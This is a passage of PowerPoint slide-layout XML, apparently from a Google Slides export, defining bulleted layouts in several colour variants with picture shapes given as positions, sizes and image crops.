          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709650"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="834" name="Google Shape;834;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2205600"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="835" name="Google Shape;835;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2755163"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="836" name="Google Shape;836;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3277788"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="837" name="Google Shape;837;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2883" b="2892"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3794760"/>
            <a:ext cx="520980" cy="393192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="838" name="Google Shape;838;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2883" b="2892"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4343400"/>
            <a:ext cx="520980"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42. Bullets 1–7 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 839"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="840" name="Google Shape;840;p43"/>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4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2" name="Google Shape;842;p4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43" name="Google Shape;843;p4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844" name="Google Shape;844;p4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845" name="Google Shape;845;p4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46" name="Google Shape;846;p4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7" name="Google Shape;847;p43"/>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8" name="Google Shape;848;p43"/>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43"/>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50" name="Google Shape;850;p43"/>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43"/>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52" name="Google Shape;852;p43"/>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43"/>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54" name="Google Shape;854;p43"/>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43"/>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56" name="Google Shape;856;p43"/>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43"/>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58" name="Google Shape;858;p43"/>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43"/>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60" name="Google Shape;860;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1171588"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="861" name="Google Shape;861;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709650"/>
            <a:ext cx="521208" cy="396119"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="862" name="Google Shape;862;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2205600"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="863" name="Google Shape;863;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2755163"/>
            <a:ext cx="521208" cy="396119"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="864" name="Google Shape;864;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3277788"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="865" name="Google Shape;865;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1616" b="1616"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3794760"/>
            <a:ext cx="520980" cy="393192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="866" name="Google Shape;866;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1616" b="1616"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4343400"/>
            <a:ext cx="520980"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43. Bullets 1–8 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 867"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="868" name="Google Shape;868;p4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69" name="Google Shape;869;p4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70" name="Google Shape;870;p4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871" name="Google Shape;871;p4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872" name="Google Shape;872;p4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73" name="Google Shape;873;p4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4" name="Google Shape;874;p44"/>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44"/>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6" name="Google Shape;876;p44"/>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44"/>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8" name="Google Shape;878;p44"/>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44"/>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80" name="Google Shape;880;p44"/>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44"/>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82" name="Google Shape;882;p44"/>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44"/>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84" name="Google Shape;884;p44"/>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44"/>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86" name="Google Shape;886;p44"/>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44"/>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88" name="Google Shape;888;p44"/>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44"/>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90" name="Google Shape;890;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="891" name="Google Shape;891;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1037"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709928"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="892" name="Google Shape;892;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2129247"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="893" name="Google Shape;893;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1037"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2577303"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="894" name="Google Shape;894;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2999232"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="895" name="Google Shape;895;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1037"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3438144"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="896" name="Google Shape;896;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3877056"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="897" name="Google Shape;897;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1037"/>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44. Bullets 1–8 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 898"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="899" name="Google Shape;899;p4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0" name="Google Shape;900;p4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901" name="Google Shape;901;p4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902" name="Google Shape;902;p4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903" name="Google Shape;903;p4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904" name="Google Shape;904;p4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5" name="Google Shape;905;p45"/>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45"/>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7" name="Google Shape;907;p45"/>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45"/>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9" name="Google Shape;909;p45"/>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45"/>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1" name="Google Shape;911;p45"/>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45"/>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3" name="Google Shape;913;p45"/>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45"/>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5" name="Google Shape;915;p45"/>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45"/>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7" name="Google Shape;917;p45"/>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45"/>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9" name="Google Shape;919;p45"/>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45"/>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21" name="Google Shape;921;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="922" name="Google Shape;922;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709928"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="923" name="Google Shape;923;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2129247"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="924" name="Google Shape;924;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2577303"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="925" name="Google Shape;925;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2999232"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="926" name="Google Shape;926;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3438144"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="927" name="Google Shape;927;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3877056"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="928" name="Google Shape;928;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>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45. Bullets 1–8 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 929"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="930" name="Google Shape;930;p4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1" name="Google Shape;931;p4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932" name="Google Shape;932;p4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933" name="Google Shape;933;p4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934" name="Google Shape;934;p4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935" name="Google Shape;935;p4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6" name="Google Shape;936;p46"/>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46"/>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8" name="Google Shape;938;p46"/>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46"/>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0" name="Google Shape;940;p46"/>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46"/>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2" name="Google Shape;942;p46"/>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46"/>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4" name="Google Shape;944;p46"/>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46"/>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6" name="Google Shape;946;p46"/>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46"/>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8" name="Google Shape;948;p46"/>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46"/>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50" name="Google Shape;950;p46"/>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46"/>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52" name="Google Shape;952;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="953" name="Google Shape;953;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709928"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="954" name="Google Shape;954;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2129247"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="955" name="Google Shape;955;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2577303"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="956" name="Google Shape;956;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2999232"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="957" name="Google Shape;957;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3438144"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="958" name="Google Shape;958;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3877056"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="959" name="Google Shape;959;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>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46. Bullets 1–8 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 960"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="961" name="Google Shape;961;p4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2" name="Google Shape;962;p4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963" name="Google Shape;963;p4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964" name="Google Shape;964;p4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965" name="Google Shape;965;p4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966" name="Google Shape;966;p4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7" name="Google Shape;967;p47"/>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47"/>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9" name="Google Shape;969;p47"/>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47"/>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1" name="Google Shape;971;p47"/>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47"/>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3" name="Google Shape;973;p47"/>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47"/>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5" name="Google Shape;975;p47"/>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47"/>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7" name="Google Shape;977;p47"/>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47"/>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9" name="Google Shape;979;p47"/>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47"/>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81" name="Google Shape;981;p47"/>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47"/>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83" name="Google Shape;983;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
